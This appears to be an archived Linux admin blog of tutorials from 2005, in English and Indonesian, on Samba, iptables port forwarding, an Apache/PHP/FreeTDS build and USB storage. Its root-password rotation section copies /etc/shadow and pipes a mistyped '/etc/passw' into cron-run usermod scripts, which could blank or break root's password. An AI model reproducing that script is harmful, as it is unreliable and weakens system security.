
SAMBA Windows to Linux Sharing

First turn on file sharing. Go to Start->Setting->Control Panel and open "Network" and in the first tab called "Configuration" click on "File and Pring Sharing..." and om the Dialog Box that comes up check "I want to be able to give others access to my files"

Now go to the file explorer and right click on the folder you want to sgare, and from the menu that pops up slect "Sharing..." and from the "Manual Properties" Dialog Box that comes up select the second tab "Sharing" and select "Shared as" which will enable all the text boxes, fill in the "Share Name" "Comments" and selct "Read Only" "Full" or "Depends on Password" and enter a password. This is the password that will give access to this share. Also note the "Share Name", lets name it "MYSHARE".

Also find out the hostname of the Windows machine. Go to Start->Setting->Control Panel and Open "Network" and in the second tab "Identification" note the "Computer Name", This is the name to use from Linux to access shares on this machine. Let it be "MYWINBOX"

Now go to the Linux machine. Crete mount point for the share.

mkdir /mnt/winstuff
Mount the share named "MYSHARE" on Windows hos namedt "MYWINBOX"

smbmount \\MYWINBOX\MYSHARE /mnt/winstuff
This will prompt you for the password for the share, enter the password and after that if you go to /mnt/winstuff you can access all files on the Windows folder.

PORT FORWARDING - with IPTABLES while using BASTILLE firewall

2005-03-08T03:02:00.000-08:00

Background on network setup

I have my home network setup as described here. So my linux gateway server is the only one visible to the internet, while all other machines are in an internal subnet with DHCP assigned IP's not visible to the outside internet, but can access the outside net using Iptables based Network Address Translation (NAT).

Why you need portforwarding

So in this setup if I want to run a public service like httpd, not on the gateway server ( where it is visible to outside ) but on an internal machine ( which is not visible outside ) how do I make it availble to the outside internet.

To make the above scenario of exposing and internal machine's service to outside we need to use port forwarding on the gateway server. Which is assigning a port on the gateway to accept all connections and forward it to the internal machines port where the service is listening to.

Let xxx.xxx.xxx.xxx be the IP address of the gateway server connected to the cable modem and 192.168.0.2 , the IP address of the internal machine. And say we want to run a web server ( httpd ) on 192,168.0.2 on port 80 which should be avaialble to the outside internet. We can forward the port 80 on xxx.xxx.xxx.xxx to port 80 of 192.168.0.2

Source: xxx.xxx.xxx.xxx:80 -- forwarded to -> 192.168.0.2:80

You can chhose any port on xxx.xxx.xxx.xxx it need not match the port we are forwarding to.

Source: xxx.xxx.xxx.xxx:8888 -- forwarded to -> 192.168.0.2:80

Port Forwarding using Iptables

Since I have been using 2.4 kernel, I use iptables for firewall and NAT. So these are the Iptable rules required for port forwarding xxx.xxx.xxx.xxx:8888 to 192.168.0.2:80 .

/sbin/iptables -t nat -A PREROUTING -p tcp -i eth0 -d xxx.xxx.xxx.xxx
--dport 8888 -j DNAT --to 192.168.0.2:80
/sbin/iptables -A FORWARD -p tcp -i eth0 -d 192.168.0.2 --dport 80 -j ACCEPT

How to add custom rules to Bastille firewall

Since I trust Bastille firwall script to generate the correct iptable scripts for my server, I wanted to keep those scripts but add these custom port forwarding rules to supplement/extend it.

But the version of Bastille on my machine ( 1.2.0 ) does not support port forwarding, and does not had a way of adding custom scripts to it. Posting the question to Bastille mailing list generated these prompt responses from Peter Watkins, core developer of Bastille. ( See the complete thread )

Following Peter's advice I upgraded Bastille to the latest version, without any problem. The new version regenerated all the scripts with my old rules intact.

And with the new Bastill in place and working fine doing all the firewall filteringa nd NAT. I made the following changes to add a supplemental script, portforward.sh ( get the script ) for my custom port forwarding rules.

Created the directories for supplemetal script. ( as explained in the comments at portforward.sh )

/etc/Bastille/firewall.d/pre-chain-split.d/

Created portforward.sh with working portforwarding rules, following the sample script from Peter.
[ Please note: The ipchains rules in portforward.sh are untested. I have left it there from Peter's sample script for completeness. ]

In portforward.sh all you have to do is specify the portforwarding source and destination IP addresses and ports with the ethernet interface name ( "eth0" if you have only one interface ) and the protocol type ( "tcp" in this case ).

IP_FORWARDS="eth0-xxx.xxx.xxx.xxx-8888-tcp-192.168.0.2-80"

Also you can have multiple port forwaring specified like:

IP_FORWARDS="eth0-xxx.xxx.xxx.xxx-8888-tcp-192.168.0.2-80
eth0-xxx.xxx.xxx.xxx-2222-tcp-192.168.0.2-22"

This will be parsed and stored into varibles down the script and used in the following Iptable calls to generate the rules. [ NOTE: The rules need to be on a single continuous line, I have broken it down to two lines for readability ]

${IPTABLES} -t nat -A PREROUTING -p $fw_inproto -i $fw_iface
-d $fw_inaddr --dport $fw_inport -j DNAT --to $fw_outaddr:$fw_outport

${IPTABLES} -A FORWARD -p $fw_inproto -i $fw_iface
-d $fw_outaddr --dport $fw_outport -j ACCEPT

Which will translate to.

/sbin/iptables -t nat -A PREROUTING -p tcp -i eth0 -d xxx.xxx.xxx.xxx
--dport 8888 -j DNAT --to 192.168.0.2:80
/sbin/iptables -A FORWARD -p tcp -i eth0 -d 192.168.0.2
--dport 80 -j ACCEPT

Now we can restart Bastille scripts to make this rules effective.

#/etc/rc.d/init.d/bastille-firewall start

Verify the rules by listing them.

# iptables -t nat -L
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
DNAT tcp -- anywhere xxx.xxx.xxx.xxxtcp dpt:ddi-tcp-1 to:192.168.0.2:80

Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
MASQUERADE all -- 192.168.0.0/16 anywhere
MASQUERADE all -- 192.168.0.0/16 anywhere
MASQUERADE all -- 192.168.0.0/16 anywhere

Chain OUTPUT (policy ACCEPT)
target prot opt source destination
#
[ where "ddi-tcp-1", I assume corresponds to port 8888 ]

Verify the port forwaring works by connecting to the port from a machine outside the network.

Notes on this setup

The above rules work fine when you access from outside, but if you try to access the same port xxx.xxx.xxx.xxx:8888 from an internal machine, it will not work. But from the internal network you dont need the forwarding, since you can directly access the machine 192.168.0.2:80.

http://www.netfilter.org/
http://www.bastille-linux.org/

Instalasi web server apache support php, ms-sql dan mysql

2005-03-07T06:09:00.000-08:00

tulisan ini timbul karena banyak teman-teman saya para programer ingin menitipkan aplikasi berbasis web di server web server berbasis linx yang dikelola oleh saya. kebetulan pada saat itu sudah ada web server apache support php dan mysql. kendala timbul ketika saya tanyakan kepada teman-teman programer apa database yang diakses, kebanyakan dari mereka menggunakan ms-sql. Dari kebutuhan tersebut saya mencari referensi-refernsi yang dibutuhkan yang ternyata belum ada referensi yang berbahasa indonesia (mungkin saya yang tidak tau, hehehehe). untuk itu saya membuat tutorial ini untuk teman-teman yang memiliki kebutuhan yang sama.saya sangat mengharapkan sekali kritik, saran dan masukan pada tulisan ini sehingga nantinya terbentuk tutorial yang representatif.
Saran, koreksi, kritik, kesalahan ketik, maupun ucapan silakan dikirimkan ke email tersebut diatas. banyak sekali kekurangan pada tutorial ini. Terima Kasih.

saya tidak terbiasa berpanjang lebar dengan kata-kata, mari kita langsung saja memulai tahapan instalasi

1. Requirement
mysql-4.0.17.tar.gz
freetds-stable.tgz
httpd-2.0.47.tar.gz
php-4.2.3.tar.gz
download file-file tersebut di situs software yang bersangkutan. apabila tidak tahu silahkan surfing di universita google, dijamin ketemu :-).
untuk semua file-file yang telah di extrack saya terbiasa meletakkannya di directory /usr/local/src. silahkan sesuaikan dengan kebutuhan anda. file-file source saya letakkan di directory /home/bdul.

2. Instalasi Mysql (optional, kalo anda ingin install mysql di web server anda)

tidak ada alasan apapun saya menggunakan mysql versi 4.0.17, karena memang saya hanya memanfaatkan source yang sudah ada di pc saya, dan kebetulan hanya itu yang ada.

buat user dan group untuk mysql, kalau sudah ada perintah dibawah ini tidak perlu dilakukan.
root@gateway:/usr/local/srcl# groupadd mysql
root@gateway:/usr/local/srcl# useradd -g mysql mysql

lanjutkan dengan extrak dan intallasi mysql dengan perintah :
root@gateway:/usr/local/srcl# tar zxvf /home/bdul/mysql-4.0.17.tar.gz
root@gateway:/usr/local/srcl# cd mysql-4.0.17
root@gateway:/usr/local/srcl# ./configure --prefix=/usr/local/mysql
root@gateway:/usr/local/srcl# make
root@gateway:/usr/local/srcl# make install

kalo proses ini semua berjalan lancar maka akan terdapat directory /usr/local/mysql. dapat terlihat seperti dibawah ini :
root@gateway:/usr/local/src# ls /usr/local/mysql
bin include info lib libexec man mysql-test share sql-bench var

sampai tahapan ini berarti anda sudah sukses menginstall mysql. tapi jangan senang dulu karena masih ada tahapan lain untuk mengkonfigurasi mysql agar dapat berjalan dengan baik.

masuk ke directory /usr/local/mysql dengan perintah :
root@gateway:/usr/local/srcl#cd /usr/local/mysql

jalankan script untuk menginstall databases pendukung dengan perintah :
root@gateway:/usr/local/mysql# scripts/mysql_install_db

ganti kepemilikan directory mysql beserta directory anak-anaknya sebagai milik root
root@gateway:/usr/local/mysql# chown -R root /usr/local/mysql

ganti kepemilikan directory mysql/data beserta anak-anaknya sebagai milik root
root@gateway:/usr/local/mysql# chown -R mysql /usr/local/mysql/var

ganti kepemilikan group dari directory mysql beserta anak-anaknya sebagai milik mysql
root@gateway:/usr/local/mysql# chgrp -R mysql /usr/local/mysql

ganti kepemilikan directory mysql/bin beserta anak-anaknya sebagai milik root
root@gateway:/usr/local/mysql# chown -R root /usr/local/mysql/bin

apabila sudah semua selesai dilakukan struktur directory mysql dapat dilihat seperti ini:
root@gateway:/usr/local/src# ls /usr/local/mysql -l
total 7
drwxr-xr-x 2 root root 1480 Jun 10 14:35 bin
drwxr-xr-x 3 root mysql 72 Jun 10 14:35 include
drwxr-xr-x 2 root mysql 104 Jun 10 14:35 info
drwxr-xr-x 3 root mysql 72 Jun 10 14:35 lib
drwxr-xr-x 2 root mysql 72 Jun 10 14:35 libexec
drwxr-xr-x 3 root mysql 72 Jun 10 14:35 man
drwxr-xr-x 6 root mysql 232 Jun 10 14:35 mysql-test
drwxr-xr-x 3 root mysql 72 Jun 10 14:35 share
drwxr-xr-x 5 root mysql 888 Jun 10 14:35 sql-bench
drwx------ 4 mysql mysql 288 Jun 16 09:21 var

mari kita jalankan mysql sebagai daemon
root@gateway:/usr/local/mysql# bin/mysqld_safe --user=mysql &

cek apakah mysql sudah aktif pada pc kita dengan perintah :
root@gateway:/usr/local/mysql# ps aux | grep mysql
root 3231 0.0 0.8 2048 1016 tty1 S 09:21 0:00 /bin/sh bin/mysqld_safe
mysql 3248 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3250 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3251 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3252 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3253 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3254 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3255 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3256 0.0 9.9 46092 12428 tty1 S 09:21 0:16 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3257 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3258 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
root 3462 0.0 0.3 1472 492 pts/0 S 15:46 0:00 grep mysql

tahapan konfigurasi telah selesai dan database server mysql sudah siap untuk diakses :-)
untuk lebih amannya mari kita setting password root untuk mysql kita ubah dulu dengan perintah:
root@gateway:/usr/local/mysql# bin/mysqladmin -u root password 'terserah'

sekarang mari kita masuk ke database servernya :
root@gateway:/usr/local/mysql# bin/mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 6 to server version: 4.0.17

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql>

selesai deh intalasi mysql nya. ternyata panjang juga ya :-)

3. Instalasi Freetds

saya memakai versi terbaru dari freetds pada saat ini (12 juni 2004) yaitu versi 0.62.3 dan saya langsung download dari situ http://www.freetds.org. Freetds ini dibutuhkan untuk antar muka koneksi ke database ms-sql, sebetulnya freetds bisa juga sebagai antar muka koneksi ke sybase tapi kita tidak sedang membahas itu :-) kalo mau, cari aja referensi ditempat lain ya.......

mari kita kembali ke directory /usr/local/src dan memulai tahapan instalasi freetds..
root@gateway:/usr/local/srcl# tar zxvf /home/bdul/freetds-stable.tgz
root@gateway:/usr/local/srcl# cd freetds-0.62.3
root@gateway:/usr/local/srcl# ./configure --prefix=/usr/local/freetds --with-tdsver=8.0 --enable-msdblib
root@gateway:/usr/local/srcl# make
root@gateway:/usr/local/srcl# make install
root@gateway:/usr/local/srcl# make clean

kalo proses ini semua berjalan lancar maka akan terdapat directory /usr/local/freetds. dapat terlihat seperti dibawah ini :
root@gateway:/usr/local/src# ls -l /usr/local/freetds
total 4
drwxr-xr-x 2 root root 144 Jun 9 10:00 bin
drwxr-xr-x 2 root root 144 Jun 9 10:00 etc
drwxr-xr-x 2 root root 488 Jun 9 10:00 include
drwxr-xr-x 2 root root 656 Jun 9 10:00 lib
drwxr-xr-x 3 root root 72 Jun 9 10:00 man
drwxr-xr-x 3 root root 72 Jun 9 10:00 share

mari kita coba untuk mencoba freetds untuk mengakses database ms-sql. sebelum mencoba kita pindah dulu ke directory freetds
root@gateway:/usr/local/srcl# cd /usr/local/freetds

untuk mencoba koneksi kita menggunakan 'tsql' . untuk lebih jelas tentang -S -U silahkan belajar sendiri aja ya........
root@gateway:/usr/local/freetds# bin/tsql -S 192.168.1.1 -U express
locale is "C"
locale charset is "ANSI_X3.4-1968"
Password:
1>

apabila mendapatkan keluaran seperti yang diatas ini, berarti instalasi freetdsnya berjalan dengan baik.

4. Instalasi apache

apache ini digunakan untuk web server, ada banyak web server yang dapat digunakan salah satunya adalah apache. mari kita mulai tahapan instalasi apache dan kembali ke direktory /usr/local/src.
root@gateway:/usr/local/srcl# tar zxvf /home/bdul/httpd-2.0.47.tar.gz
root@gateway:/usr/local/srcl# cd httpd-2.0.47
root@gateway:/usr/local/srcl# ./configure --enable-so
root@gateway:/usr/local/srcl# make
root@gateway:/usr/local/srcl# make install

kalo proses ini semua berjalan lancar maka akan terdapat directory /usr/local/apache2. dapat terlihat seperti dibawah ini :
root@gateway:/usr/local/src# ls -l /usr/local/apache2
total 23
drwxr-xr-x 2 root root 464 Jun 10 16:04 bin
drwxr-xr-x 2 root root 312 Jun 10 16:04 build
drwxr-xr-x 2 root root 96 Jun 10 16:04 cgi-bin
drwxr-xr-x 2 root root 336 Jun 10 16:08 conf
drwxr-xr-x 3 root root 1024 Jun 10 16:04 error
drwxr-xr-x 3 root root 1400 Jun 10 17:20 htdocs
drwxr-xr-x 3 root root 4600 Jun 10 16:04 icons
drwxr-xr-x 2 root root 3568 Jun 10 16:04 include
drwxr-xr-x 2 root root 448 Jun 10 16:04 lib
drwxr-xr-x 2 root root 112 Jun 11 13:34 logs
drwxr-xr-x 4 root root 96 Jun 10 16:04 man
drwxr-xr-x 14 root root 8320 Jun 10 16:04 manual
drwxr-xr-x 2 root root 112 Jun 10 16:08 modules

mari kita coba untuk mengaktifkan web server dengan perintah:
root@gateway:/usr/local/src# /usr/local/apache2/bin/apachectl start

untuk melihat servis apache berjalan dengan baik lakukan perintah berikut:
root@gateway:/usr/local/apache2# ps aux | grep apache
root 3524 1.0 2.1 5920 2684 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3525 1.0 2.1 5936 2696 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3526 0.0 2.1 5936 2696 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3527 0.0 2.1 5936 2696 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3528 0.0 2.1 5936 2696 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3529 0.0 2.1 5936 2696 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start

apabila mendapatkan keluaran seperti yang diatas ini, berarti instalasi apache berjalan dengan baik.

5. Instalasi php

Tahapan terakhir adalah install php nya sendiri. mari kita kembali ke directory /usr/local/src dan memulai dengan extrak dan installasi
root@gateway:/usr/local/src# tar zxvf /home/bdul/php-4.2.3.tar.gz
root@gateway:/usr/local/src# cd php-4.2.3
root@gateway:/usr/local/src# ./configure --with-apxs2=/usr/local/apache2/bin/apxs --with-mysql \
--with-sybase=/usr/local/freetds --with-mssql=/usr/local/freetds
root@gateway:/usr/local/src# make
root@gateway:/usr/local/src# make install

kopikan php.ini ke directory /usr/local/lib/php.ini
root@gateway:/usr/local/src# cp php.ini-dist /usr/local/lib/php.ini

edit file httpd.conf pada directory /usr/local/apache2/conf/ dan tambahkan baris berikut
LoadModule php4_module libexec/libphp4.so
AddType application/x-httpd-php .php .phtml
AddType application/x-httpd-php-source .phps

restart apache anda dengan perintah berikut
root@gateway:/usr/local/src# /usr/local/apache2/bin/apachectl restart

buat file test.php dan letakkan di directory /usr/local/apache2/htdocs. isi file adalah sebagai berikut :
phpinfo();
?>

coba akses file tersebut melalui browser anda, apabila ada keterangan konfigurasi php maka keseluruhan installasi berjalan dengan sukses :-)
jangan lupa untuk mengucapkan 'Alhamdulillah hirobbil alamin'

6. Referensi
www.apache.org
www.php.net
www.mysql.org
www.freetds.org

Pengamanan Shadow Password dengan Bash Scripting + Crontab

2005-03-07T05:13:00.000-08:00

1. Persiapan

Login ke level Superuser, lalu buatlah direktori untuk menyimpan file2 shadow password dan direktori untuk file2 script-nya. Terserah anda mau membuatnya dimana..... yang penting mudah dimengerti. Saya meletakkan file2 shadownya di /home/backup/etc dan untuk file script-nya di /home/backup/script.
Lalu backup /etc/shadow ke direktori yg telah anda buat, untuk berjaga-jaga ......... jikalau anda lupa passwd rootnya ....... tinggal di recovery saja .........

[sysadmin@notebook]$ /bin/su root
[root@notebook]# cd /home
[root@notebook]# mkdir -p backup/etc
[root@notebook]# mkdir -p backup/script

[root@notebook]# cp /etc/shadow /home/backup/etc
[root@notebook]# chmod 600 backup
-
Langkah 1. Disini kita membuat passwd baru untuk root
-
[root@notebook]# passwd
Changing password for root
Enter the new password (minimum of 5, maximum of 127 characters)
Please use a combination of upper and lower case letters and numbers.
New password:
Re-enter new password:
-
Langkah 2. Kemudian kutip baris yang mengandung kata "root" pada /etc/shadow
-
[root@notebook]# grep ^root /etc/passw > /home/backup/etc/shadow0

Ulangi lagi langkah 1 dengan passwd yang berbeda, dimana pada langkah 2 anda buat spt ini :
-
[root@notebook]# grep ^root /etc/passw > /home/backup/etc/shadow1

Ulangi terus dari langkah1 dan langkah 2 tadi..... jangan lupa untuk mengutip passwd root yang telah anda buat berbeda-beda
-
[root@notebook]# grep ^root /etc/passw > /home/backup/etc/shadow2
[root@notebook]# grep ^root /etc/passw > /home/backup/etc/shadow3
[root@notebook]# grep ^root /etc/passw > /home/backup/etc/shadow4
[root@notebook]# grep ^root /etc/passw > /home/backup/etc/shadow5
-
Ubah permission filenya, lalu lihat apakah file yang memiliki kutipan shadow passwd root sudah komplit ada 6 file -
-
[root@notebook]# chmod 600 /home/backup/etc/*
[root@notebook]# ls -l /home/backup/etc/
-rw------- 1 root root 53 2004-09-12 21:10 shadow0
-rw------- 1 root root 53 2004-09-12 21:11 shadow1
-rw------- 1 root root 53 2004-09-12 21:11 shadow2
-rw------- 1 root root 53 2004-09-12 21:11 shadow3
-rw------- 1 root root 53 2004-09-12 21:11 shadow4
-rw------- 1 root root 53 2004-09-12 21:11 shadow5

2. Pembuatan Script

Pada bagian ini kita akan membuat script yang berfungsi untuk mengubah password /etc/shadow dengan file kutipan shadow passwd root yang anda backup tadi.
Masuk ke direktori /home/backup/script, lalu isi file script tersebut dengan editing favorit anda....
-
[root@notebook]# cd /home/backup/script/
[root@notebook]# vim ubah0
#!/bin/bash
backupfile="/home/backup/etc/shadow0"
usermod -p"`cut -f2 -d: $backupfile`" root
-
[root@notebook]# vim ubah1
#!/bin/bash
backupfile="/home/backup/etc/shadow1"
usermod -p"`cut -f2 -d: $backupfile`" root
-
Buat 6 file script (ubah0, ubah1 s/d ubah5), perhatikan penomoran script maupun penomoran shadow-nya, karena itu bagian yang sensitif .......... ^_^
Setelah ke 6 script tersebut selesai dibuat, ubah permission scriptnya ......
-
[root@notebook]# chmod 700 /home/backup/script/*
[root@notebook]# ls -l /home/backup/script/
-rwx------ 1 root root 114 2004-09-12 21:18 ubah0
-rwx------ 1 root root 114 2004-09-12 21:17 ubah1
-rwx------ 1 root root 114 2004-09-12 21:18 ubah2
-rwx------ 1 root root 114 2004-09-12 21:18 ubah3
-rwx------ 1 root root 114 2004-09-12 21:18 ubah4
-rwx------ 1 root root 114 2004-09-12 21:18 ubah5

3. Mengatur Waktu Eksekusi Script Pengubah Shadow Password Pada Crontab

Pada Skenario ini, aku mengatur script tsb agar dieksekusi setiap 5 menit sekali .......... ^_^
Dimana pada menit ke 1 s/d 29 ... akan meng-eksekusi script ubah0-5, dan pada menit ke 30 s/d 59 akan mengulangi proses eksekusi dari scrip ubah0 lagi .

Tambahkan line ini pada /var/spool/cron/crontabs/root
-
00 * * * * /home/backup/script/./ubah0
05 * * * * /home/backup/script/./ubah1
10 * * * * /home/backup/script/./ubah2
15 * * * * /home/backup/script/./ubah3
20 * * * * /home/backup/script/./ubah4
25 * * * * /home/backup/script/./ubah5
30 * * * * /home/backup/script/./ubah0
35 * * * * /home/backup/script/./ubah1
40 * * * * /home/backup/script/./ubah2
45 * * * * /home/backup/script/./ubah3
50 * * * * /home/backup/script/./ubah4
55 * * * * /home/backup/script/./ubah5
-
Restart crond anda
-
[root@notebook]# killall -HUP crond
-
Lihat penampakan proses eksekusi cronnya di /var/log/cron, perhatikan baik-baik waktunya ............. ^_^
-
[root@notebook]# tail -f /var/log/cron
Sep 12 23:00:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah0
Sep 12 23:05:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah1
Sep 12 23:10:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah2
Sep 12 23:15:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah3
Sep 12 23:20:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah4
Sep 12 23:25:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah5
Sep 12 23:30:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah0

.
.
dst ....

Ikuti juga perubahan passwd rootnya
-
[root@notebook]# tail -f /var/log/secure
Sep 12 23:00:01 iman usermod[3519]: change user `root' password
Sep 12 23:05:01 iman usermod[3519]: change user `root' password
Sep 12 23:10:01 iman usermod[3519]: change user `root' password
Sep 12 23:15:01 iman usermod[3519]: change user `root' password
Sep 12 23:20:01 iman usermod[3524]: change user `root' password
Sep 12 23:25:01 iman usermod[3530]: change user `root' password
Sep 12 23:30:02 iman usermod[3533]: change user `root' password
.
.
dst ....
-
Sekarang passwd root anda telah diubah otomatis menggunakan 5 passwd yang berbeda setiap 5 menit...... silahkan anda tambahkan lagi passwdnya jika merasa hal diatas masih kurang secure ..... dengan menambahkan shadow6 s/d seterusnya... atau juga anda set saja tiap menit passwdnya berubah2 terus.

Jangan sampe lupa passwdnya ............ ^_^

Selamat mencoba, Salam dari Medan City

5. Referensi

1. Manual page cut
2. Manual page crond
3. Manual page crontab
4. Manual page usermod

Flashdisk di Linux

2005-03-07T05:10:00.000-08:00

Flashdisk ato orang menyebutnya usb flashdisk adalah piranti kecil penyimpan data portable yang bisa dipakai disemua OS termasuk Linux, untuk mengaktifkan flashdisk ini cukup mudah, syaratnya hanya kernel yang support / mendukung USB, dan biasanya setiap distro (kernel default/bawaan sudah support USB)

1. Cek module usb
Ceklah modul USB apakah sudah terpasang atau belum caranya:
ketik lsmod | grep usb; lsmod | grep ehci
jika sudah terpasang akan terlihat kurang lebih seperti ini:

dihack@idban:~> lsmod | grep usb; lsmod | grep ehci
usb-storage 71168 0
scsi_mod 97248 5 [sd_mod st sr_mod sg usb-storage]
usb-uhci 23888 0 (unused)
usbcore 64844 1 [usb-storage usb-uhci ehci-hcd]
ehci-hcd 18284 0 (unused)
usbcore 64844 1 [usb-storage usb-uhci ehci-hcd]

Catatan: jangan lihat angka - angkanya, tapi perhatikan nama modulenya seperti usb-storage, scsi_mod dan lain lain, jangan lupa untuk memasang juga modul vfat atau fat, karena biasanya type partisi yang digunakan flashdisk adalah FAT16

2. Pasang module usb
Jika module module tadi tidak terpasang, pasanglah satu persatu dng perintah: modprobe nama_module
misalnya modprobe usb-strorage

3. Pasang dan Cek flashdisk
Jika semuanya sudah tepasang, pasanglah flashdisk tadi ke port USB, kemudian jalankan printah dmesg untuk melihat apa yang terjadi

dihack@idban:> dmesg
.....skipped
hub.c: new USB device 00:1d.7-3, assigned address 7
WARNING: USB Mass Storage data integrity not assured
USB Mass Storage device found at 7
SCSI device sda: 251904 512-byte hdwr sectors (129 MB)
sda: Write Protect is off
sda: sda4

contoh diatas adalah flashdisk yang terdeteksi pada Linux dan berada pada SCSI pertama (sda) ini dapat berbeda beda tiap komputer.

4. Cek Type flashdisk
Setelah ini cek type partisi flashdisknya, dengan cara:
sfdisk -l /dev/sda

idban:/root # /sbin/sfdisk -l /dev/sda

Disk /dev/sda: 246 cylinders, 32 heads, 32 sectors/track
Units = cylinders of 524288 bytes, blocks of 1024 bytes, counting from 0

Device Boot Start End #cyls #blocks Id System
/dev/sda1 0 - 0 0 0 Empty
/dev/sda2 0 - 0 0 0 Empty
/dev/sda3 0 - 0 0 0 Empty
/dev/sda4 * 0+ 245 246- 125936 6 FAT16

terlihat disana flashdisk yang berada di sda menggunakan FAT16

5. Edit /etc/fstab
Setelah kita tahu apa type partisinya kemudian buatlah direktory tempat memount flashdisk tadi
misalnya di /mnt/flashdisk dengan perintah mkdir /mnt/flashdisk
Kemudian tambahkan :

/dev/sda4 /mnt/flashdisk vfat sync,noauto,user,exec 0 0

atau:

/dev/sda4 /mnt/flashdisk auto sync,noauto,user,exec 0 0

pada /etc/fstab

6. Proses Mount
Setelah semua tadi beres, flashdisk bisa dimount dengan perintah

mount /dev/sda4

atau

mount /mnt/flasdisk

CATATAN
tahap 2, 4 dan 5 membutuhkan root akses.
==============================================================

Mount otomatis menggunakan autofs

Kalo mau mount otomatis bisa menggunakan autofs/automount. Kalo di redhat tinggal edit /etc/auto.master dan uncomment baris terakhir

/misc /etc/auto.misc --timeout=60

lalu edit juga /etc/auto.misc dan tambahkan line

usbdisk -fstype=vfat,sync,umask=000,uid=500,gid=500 :/dev/sda1

namanya terserah, bisa "usbdisk" atau "unyil", terserah...

Lalu jalankan service autofs (bisa anda buat jalan otomatis waktu boot, kalo belum). Sesudah itu, nanti automount akan otomatis mount di /misc/usbdisk setiap kali anda mengakses ke sana (misalnya dg nautilus atau 'cd' dari shell). Tip: coba sambil perhatikan /var/log/messages untuk memahami urutan prosesnya dari mulai colok USB sampe mount.

LinuxTutorial

Last edited on Tuesday, March 16, 2004 2:09:08 pm.

USB HDD External di Linux

2005-03-07T05:07:00.000-08:00

writer:
Iman Rahmadsyah Harahap / a_ir_hrp (shakysonyo@hotpop.com)

USB Hdd External merupakan suatu device mobile seperti FlashDisk yang dapat menampung data dengan kapasitas besar dalam ukuran Gigabyte serta bisa digunakan pada Linux.
Device ini merupakan solusi bagi siapa saja yang memiliki keterbatasan kapasitas harddisk, baik notebook, PC ataupun sekedar sebagai data backup.

Jenis & Ragam device USB External ini sangat banyak, tapi 2 hal yang umum adalah dari segi ukuran hard drivenya yaitu Hdd PC (with Adapter Power) & Hdd Notebook (without Adapter Power). Biasanya perangkat USB External ini dijual terpisah antara casing dengan hdd-nya.

1. Persiapan perangkat
- Periksa jumper, terserah anda mau di set sebagai primary, secondary ato lainnya ( Saya lebih suka Primary.... :-p )
- Pasang bus data (cable data) & cable powernya ke hdd.
- Baut/mur hdd ke casing jangan lupa di pasang.
- Sekarang pakaikan bajunya... ehh... salah... pasang casing penutup hdd nya & jgn lupa di baut/mur lagi yach ... :D

2. Persiapan Module
- Gih Baca lagi artikel nya mas Idban ...
- Sekedar mengulang saja (maaf mas Idban... saya contek dikit), lihat module USB anda sudah terpasangkah ?
anda dapat melihatnya dengan menjalankan perintah berikut,

sysadmin@iman$ lsmod |grep usb; lsmod |grep ehci
usb_storage 30464 2
usbcore 117092 5 ehci_hcd,usb_storage,uhci_hcd
ehci_hcd 31108 0
usbcore 117092 5 ehci_hcd,usb_storage,uhci_hcd

-

- Jika module tersebut kelihatan seperti diatas, sampai saat ini anda bisa sedikit lega ...
- Jika tidak kelihatan silahkan jalankan module2-nya... uppss jangan lupa login sebagai root.....

-

sysadmin@iman$ /bin/su -
